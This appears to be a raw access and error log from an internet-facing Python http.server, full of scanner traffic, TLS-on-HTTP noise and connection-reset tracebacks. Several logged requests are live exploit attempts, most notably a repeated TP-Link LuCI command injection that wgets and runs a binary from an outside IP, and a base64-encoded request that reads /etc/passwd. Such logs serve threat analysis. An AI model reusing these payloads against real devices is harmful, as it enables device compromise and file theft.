readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 61954) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 25752) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 65073) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- ---------------------------------------- Exception occurred during processing of request from ('3.101.216.72', 44314) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 3.101.216.72 - - [06/Apr/2024 08:32:19] "GET / HTTP/1.0" 200 - 3.101.216.72 - - [06/Apr/2024 08:32:28] code 404, message File not found 3.101.216.72 - - [06/Apr/2024 08:32:28] code 501, message Unsupported method ('POST') 3.101.216.72 - - [06/Apr/2024 08:32:28] "GET /nmaplowercheck1712352748 HTTP/1.1" 404 - 3.101.216.72 - - [06/Apr/2024 08:32:28] "GET / HTTP/1.0" 200 - 3.101.216.72 - - [06/Apr/2024 08:32:28] "POST /sdk HTTP/1.1" 501 - 3.101.216.72 - - [06/Apr/2024 08:32:29] "GET / HTTP/1.1" 200 - 3.101.216.72 - - [06/Apr/2024 08:32:29] code 404, message File not found 3.101.216.72 - - [06/Apr/2024 08:32:29] "GET /evox/about HTTP/1.1" 404 - 3.101.216.72 - - [06/Apr/2024 08:32:29] code 404, message File not found 3.101.216.72 - - [06/Apr/2024 08:32:29] "GET /HNAP1 HTTP/1.1" 404 - 3.101.216.72 - - [06/Apr/2024 08:32:38] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01ü\\x03\\x03S\\x0f¼ÞÅ\\x88\\x9a\\x9dKw5XüëP¡bi\\x98ÄÇër¶Ë~\\x86åq¼\\\\R') 3.101.216.72 - - [06/Apr/2024 08:32:38] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03S\x0f¼ÞÅ\x88\x9a\x9dKw5XüëP¡bi\x98ÄÇër¶Ë~\x86åq¼\\R ¼¤\x9a¾­\x04" 400 - 3.101.216.72 - - [06/Apr/2024 08:32:39] code 400, message Bad request version ("`\\x0e»Ì\\x8dN®Å#ú\\x18|Tüèêb\\x81Ù¥¦\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.216.72 - - [06/Apr/2024 08:32:39] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03ÿH·\x0fí5ù"6Ñ&\x96²\x098qå­b\x18Ä&Çô\x89\x04\x96T.\x16Zÿ \x92me9ñòÔ\x85\x94Ñ\x1c`\x0e»Ì\x8dN®Å#ú\x18|Tüèêb\x81Ù¥¦\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.216.72 - - [06/Apr/2024 08:32:39] code 400, message Bad request version ("\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.216.72 - - [06/Apr/2024 08:32:39] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03ÿ\x1aó¢ÁÇ\x1f»ç\x84ýÊÞ[w\x07Ù{mÚÍ>·\x11ûÄ\x0fªD«T\x94 Êø¥Q\x9cö\x11÷%\x9f´-®Äë½Ó|úò\x0f|@\x02á\x91\x99§âêð\x1c\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.216.72 - - [06/Apr/2024 08:32:39] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01ü\\x03\\x03\\x83\\x92') 3.101.216.72 - - [06/Apr/2024 08:32:39] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03\x83\x92\x1fñl" 400 - 3.101.216.72 - - [06/Apr/2024 08:32:40] code 400, message Bad request version ("è9ÓȬ÷aXH\\x9a\\x14\\\\¼?ç±\\x94ùR1fȪ}7\\x07BXç\\x93[,\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.216.72 - - [06/Apr/2024 08:32:40] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03Ácåð\x84ÔDë\x9b±ÍqE¤+.5®+U\x9ft)í\x15\x15Õ\x80\x1e£RT è9ÓȬ÷aXH\x9a\x14\\¼?ç±\x94ùR1fȪ}7\x07BXç\x93[,\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.216.72 - - [06/Apr/2024 08:32:40] code 400, message Bad request version ("%¬/\\x82Y\\x8cp:`ýK¯\\x10p©©¿\\x03!Û\\x06\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.216.72 - - [06/Apr/2024 08:32:40] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03\x89²0\x92Wãí\x87/´\x83\x9cÍÑs90ûA\x1e]\x1f¼ï£ÀãT°)B: Ï\x9cªß\x13Êe²â\x88\x0b%¬/\x82Y\x8cp:`ýK¯\x10p©©¿\x03!Û\x06\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.216.72 - - [06/Apr/2024 08:32:40] code 400, message Bad request version ("t´\\x18Ø·R*:A°p§qhs\\x88ÙïË¡µ<ØÂÇ\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.216.72 - - [06/Apr/2024 08:32:40] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03Ò\x87Ógrë\\ây,Ê<âü\\Õ\x0eáZ½L=¢\x1cUà9ÈÆ)yÒ í\x09\x92ò\x81\x8b t´\x18Ø·R*:A°p§qhs\x88ÙïË¡µ<ØÂÇ\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.216.72 - - [06/Apr/2024 08:32:41] code 400, message Bad request version ("Òw¸h|Q¿½èÒ\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.216.72 - - [06/Apr/2024 08:32:41] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03õÒo\x99SÌu±TÜÊ]\x82Å\x8fÂ\x0fñ\x15fs\x07\x09\x0d\x9aïF´ÖL\x94\x92 ¬\x09ø \x1d( Å¬\x17íÒ¯"\x97\x08ºÅ$ÐÁ Òw¸h|Q¿½èÒ\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.216.72 - - [06/Apr/2024 08:32:41] code 400, message Bad request version ("y\\x81\\x0ejgÒýP\\x8fg\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.216.72 - - [06/Apr/2024 08:32:41] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03µ\x01\x87q\x1b\x7fþ(&Ë\x87G\x98ëFÜ\\äx\x8e7ý\x94\\\x1f²\x85\x13Þ/ªð @\x17Pr©+f\x15å\x9f¼B\x05#%Ahº\x0dË\x05\x0by\x81\x0ejgÒýP\x8fg\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.216.72 - - [06/Apr/2024 08:32:42] code 400, message Bad request version ("\\x9a),W\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.216.72 - - [06/Apr/2024 08:32:42] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03\x10u«?\x91\x8c$<ò\x7f]\x844U'Í`\x8f-«\x8aºa½-Íü\\\x01Õ\x9a4 Ò9¯q?ÍäØ;µç£e\x9b\x0d\x88Æ}QßúDeÈ×RÛ\x85\x9a),W\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.216.72 - - [06/Apr/2024 08:32:42] code 400, message Bad request version ("¡~Y}.´û9ª\\x96\\x12vfÇ\\x12)\\x11\\x12'ÓDG¡ç\\x98dWBÄ-XT\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.216.72 - - [06/Apr/2024 08:32:42] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03¼È°V×9\x0cfµ\x06`±\x9dOCú\x7f6¶ì,\x96;\x87=\x01\x1amI$ÉÛ ¡~Y}.´û9ª\x96\x12vfÇ\x12)\x11\x12'ÓDG¡ç\x98dWBÄ-XT\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.216.72 - - [06/Apr/2024 08:32:42] code 400, message Bad request version ("±\\x02\\x08óHíT¶ãE\\x16\\x94Å&IØ\\x00\\x9c\\x13\\x02\\x13\\x03\\x13\\x01\\x003\\x009\\x005\\x00/À,À0\\x00£\\x00\\x9f̨̩̪À¯À\\xadÀ£À\\x9fÀ]ÀaÀWÀSÀ+À/\\x00¢\\x00\\x9eÀ®À¬À¢À\\x9eÀ\\\\À`ÀVÀRÀ$À(\\x00k\\x00jÀsÀw\\x00Ä\\x00ÃÀ#À'\\x00g\\x00@ÀrÀv\\x00¾\\x00½À") 3.101.216.72 - - [06/Apr/2024 08:32:42] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03¿õójÁ\x1bÏÑ\x97wå^a=m»aö\x07ÌxÅÛN\x09¢Ô)\x08¶}I \x13³¾!\x12\x9e¿+Ø\x16\x07%2\x85¸\x09±\x02\x08óHíT¶ãE\x16\x94Å&IØ\x00\x9c\x13\x02\x13\x03\x13\x01\x003\x009\x005\x00/À,À0\x00£\x00\x9f̨̩̪À¯À­À£À\x9fÀ]ÀaÀWÀSÀ+À/\x00¢\x00\x9eÀ®À¬À¢À\x9eÀ\\À`ÀVÀRÀ$À(\x00k\x00jÀsÀw\x00Ä\x00ÃÀ#À'\x00g\x00@ÀrÀv\x00¾\x00½À" 400 - 3.101.216.72 - - [06/Apr/2024 08:32:43] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01ü\\x03\\x03Y\\x05åÔ¢~V\\x95\\x16ð') 3.101.216.72 - - [06/Apr/2024 08:32:43] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03Y\x05åÔ¢~V\x95\x16ð\x0cVJÎÛÓ¹\\xadO¥%Ö\\x95Év\\x9fùu\\x17\\x03ªÄ>&ÑÓg-|\\x00\\x00PÀ/À+À\\x11À\\x07À\\x13À') 3.10.180.41 - - [07/Apr/2024 18:00:31] "\x16\x03\x01\x00±\x01\x00\x00­\x03\x03\x17ÜMëÇDôQ>¹­O¥%Ö\x95Év\x9fùu\x17\x03ªÄ>&ÑÓg-|\x00\x00PÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 3.10.180.41 - - [07/Apr/2024 18:02:11] code 404, message File not found 3.10.180.41 - - [07/Apr/2024 18:02:11] "GET /favicon.ico HTTP/1.1" 404 - 3.10.180.41 - - [07/Apr/2024 18:04:00] code 400, message Bad request version ('À\\x14À') 3.10.180.41 - - [07/Apr/2024 18:04:00] "\x16\x03\x01\x00±\x01\x00\x00­\x03\x03\x9e\x9c\x03"JbEPÛ5-zúðã\x9f\x96\x06×ùz&evé òÀE\x93~Ýñ\x07Ô¾[±Ùw\x99÷í1N$¿8·\x048K\x85\x0eÍò½\x00\x00PÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 3.10.180.41 - - [07/Apr/2024 18:43:51] code 404, message File not found 3.10.180.41 - - [07/Apr/2024 18:43:51] "GET /doc/index.html HTTP/1.1" 404 - 3.10.180.41 - - [07/Apr/2024 18:47:47] code 400, message Bad request version ('À\\x14À') 3.10.180.41 - - [07/Apr/2024 18:47:47] "\x16\x03\x01\x00±\x01\x00\x00­\x03\x03æø]Zi\x8cµ\x9b¾\x17Û¯Øv»Ò¦ñ \x16©g\x9eYèìn\x8bE\x8fpì\x00\x00PÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 3.10.180.41 - - [07/Apr/2024 18:50:01] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [07/Apr/2024 18:53:47] code 404, message File not found 185.196.9.61 - - [07/Apr/2024 18:53:47] "GET /api/get_device_details HTTP/1.1" 404 - 198.199.92.122 - - [07/Apr/2024 19:27:15] code 400, message Bad request syntax ('MGLNDD_194.193.213.117_80') 198.199.92.122 - - [07/Apr/2024 19:27:15] "MGLNDD_194.193.213.117_80" 400 - 185.224.128.34 - - [07/Apr/2024 19:36:33] code 404, message File not found 185.224.128.34 - - [07/Apr/2024 19:36:33] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 64.62.156.12 - - [07/Apr/2024 19:41:28] "GET / HTTP/1.1" 200 - 64.62.156.10 - - [07/Apr/2024 19:43:26] code 404, message File not found 64.62.156.10 - - [07/Apr/2024 19:43:26] "GET /favicon.ico HTTP/1.1" 404 - 64.62.156.12 - - [07/Apr/2024 19:43:54] code 404, message File not found 64.62.156.12 - - [07/Apr/2024 19:43:54] "GET /geoserver/web/ HTTP/1.1" 404 - 185.242.226.99 - - [07/Apr/2024 19:46:07] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [07/Apr/2024 20:10:51] code 501, message Unsupported method ('POST') 185.196.9.61 - - [07/Apr/2024 20:10:51] "POST /goform/formWsc HTTP/1.1" 501 - 184.105.139.67 - - [07/Apr/2024 20:15:47] code 400, message Bad request version ('À\\x14À') 184.105.139.67 - - [07/Apr/2024 20:15:47] "\x16\x03\x01\x00{\x01\x00\x00w\x03\x03Îw\x9f\x05\x14«;Lb¼\x8a\x0de\x0bÂçª<|\x80[ýöå9\x7f_iÜH&?\x00\x00\x1aÀ/À+À\x11À\x07À\x13À\x09À\x14À" 400 - 146.19.24.28 - - [07/Apr/2024 20:18:09] "GET / HTTP/1.1" 200 - 206.168.34.186 - - [07/Apr/2024 20:32:07] "GET / HTTP/1.1" 200 - 206.168.34.186 - - [07/Apr/2024 20:32:08] code 505, message Invalid HTTP version (2.0) 206.168.34.186 - - [07/Apr/2024 20:32:08] "PRI * HTTP/2.0" 505 - 206.168.34.186 - - [07/Apr/2024 20:32:08] code 404, message File not found 206.168.34.186 - - [07/Apr/2024 20:32:08] "GET /favicon.ico HTTP/1.1" 404 - 185.196.9.61 - - [07/Apr/2024 21:11:29] code 404, message File not found 185.196.9.61 - - [07/Apr/2024 21:11:29] "GET /openam/oauth2/..;/ccversion/Version HTTP/1.1" 404 - 185.224.128.43 - - [07/Apr/2024 21:14:34] "GET / HTTP/1.1" 200 - 87.121.69.52 - - [07/Apr/2024 21:50:22] code 501, message Unsupported method ('CONNECT') 87.121.69.52 - - [07/Apr/2024 21:50:22] "CONNECT google.com:443 HTTP/1.1" 501 - 185.196.9.61 - - [07/Apr/2024 21:57:52] code 404, message File not found 185.196.9.61 - - [07/Apr/2024 21:57:52] "GET /oam/server/opensso/sessionservice HTTP/1.1" 404 - 185.224.128.34 - - [07/Apr/2024 22:17:54] code 404, message File not found 185.224.128.34 - - [07/Apr/2024 22:17:54] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 146.19.24.28 - - [07/Apr/2024 22:20:23] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [07/Apr/2024 22:45:26] "GET / HTTP/1.1" 200 - 78.153.140.179 - - [07/Apr/2024 23:10:51] code 400, message Bad request syntax ('\\x16\\x03\\x01\\x00Þ\\x01\\x00\\x00Ú\\x03\\x03ÉîG&fp\\x079\\x9bÊeç\\x12½+ôåY¿\\\\öÂBº\\x1b\\x8f\\x97\\x1b®') 78.153.140.179 - - [07/Apr/2024 23:10:51] "\x16\x03\x01\x00Þ\x01\x00\x00Ú\x03\x03ÉîG&fp\x079\x9bÊeç\x12½+ôåY¿\\öÂBº\x1b\x8f\x97\x1b®" 400 - 78.153.140.179 - - [07/Apr/2024 23:10:51] code 404, message File not found 78.153.140.179 - - [07/Apr/2024 23:10:51] "GET /.env HTTP/1.1" 404 - 109.205.213.198 - - [07/Apr/2024 23:27:22] "GET / HTTP/1.1" 200 - 45.125.66.34 - - [08/Apr/2024 00:57:25] code 501, message Unsupported method ('CONNECT') 45.125.66.34 - - [08/Apr/2024 00:57:25] "CONNECT google.com:443 HTTP/1.1" 501 - 146.19.24.28 - - [08/Apr/2024 01:18:04] "GET / HTTP/1.1" 200 - 164.52.0.94 - - [08/Apr/2024 01:26:28] code 400, message Bad request version ("õ»d=eò¸@Â\\x00>\\x13\\x02\\x13\\x03\\x13\\x01À,À0\\x00\\x9f̨̩̪À+À/\\x00\\x9eÀ$À(\\x00kÀ#À'\\x00gÀ") 164.52.0.94 - - [08/Apr/2024 01:26:28] "\x16\x03\x01\x02\x00\x01\x00\x01ü\x03\x03\x9a\x15¬ªõÚÏñ\x9fìZ;ÞÇ©J²Àï*4\x10h`ÃdEi0\x1c\\å ñY=I\x14\x04Ì¡\x8bzP¤*âZ\x1eù÷oÑë^\x0dõ»d=eò¸@Â\x00>\x13\x02\x13\x03\x13\x01À,À0\x00\x9f̨̩̪À+À/\x00\x9eÀ$À(\x00kÀ#À'\x00gÀ" 400 - 164.52.0.94 - - [08/Apr/2024 01:26:56] "GET / HTTP/1.1" 200 - 164.52.0.94 - - [08/Apr/2024 01:27:26] code 404, message File not found 164.52.0.94 - - [08/Apr/2024 01:27:26] "GET /favicon.ico HTTP/1.1" 404 - 185.224.128.43 - - [08/Apr/2024 01:32:48] "GET / HTTP/1.1" 200 - 185.224.128.34 - - [08/Apr/2024 02:07:16] code 404, message File not found 185.224.128.34 - - [08/Apr/2024 02:07:16] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F103.163.214.97%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk) HTTP/1.1" 404 - 185.196.9.61 - - [08/Apr/2024 02:08:52] code 501, message Unsupported method ('POST') 185.196.9.61 - - [08/Apr/2024 02:08:52] "POST /cgi/networkDiag.cgi HTTP/1.1" 501 - ---------------------------------------- Exception occurred during processing of request from ('198.74.56.46', 33479) Traceback (most recent call last): File "/usr/lib/python3.11/socketserver.py", line 691, in process_request_thread self.finish_request(request, client_address) File "/usr/lib/python3.11/http/server.py", line 1306, in finish_request self.RequestHandlerClass(request, client_address, self, File "/usr/lib/python3.11/http/server.py", line 667, in __init__ super().__init__(*args, **kwargs) File "/usr/lib/python3.11/socketserver.py", line 755, in __init__ self.handle() File "/usr/lib/python3.11/http/server.py", line 432, in handle self.handle_one_request() File "/usr/lib/python3.11/http/server.py", line 400, in handle_one_request self.raw_requestline = self.rfile.readline(65537) ^^^^^^^^^^^^^^^^^^^^^^^^^^ File "/usr/lib/python3.11/socket.py", line 706, in readinto return self._sock.recv_into(b) ^^^^^^^^^^^^^^^^^^^^^^^ ConnectionResetError: [Errno 104] Connection reset by peer ---------------------------------------- 198.74.56.46 - - [08/Apr/2024 02:21:24] "GET / HTTP/1.1" 200 - 185.196.9.61 - - [08/Apr/2024 02:24:08] code 404, message File not found 185.196.9.61 - - [08/Apr/2024 02:24:08] "GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1" 404 - 185.196.9.61 - - [08/Apr/2024 02:24:11] code 404, message File not found 185.196.9.61 - - [08/Apr/2024 02:24:11] "GET /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1" 404 - 146.19.24.28 - - [08/Apr/2024 02:41:26] "GET / HTTP/1.1" 200 - 109.205.213.198 - - [08/Apr/2024 02:44:41] "GET / HTTP/1.1" 200 - 172.104.11.4 - - [08/Apr/2024 02:50:12] "GET / HTTP/1.1" 200 - 47.115.225.21 - - [08/Apr/2024 03:19:24] code 404, message File not found 47.115.225.21 - - [08/Apr/2024 03:19:24] "GET /wp-login.php HTTP/1.1" 404 - 146.19.24.28 - - [08/Apr/2024 03:29:49] 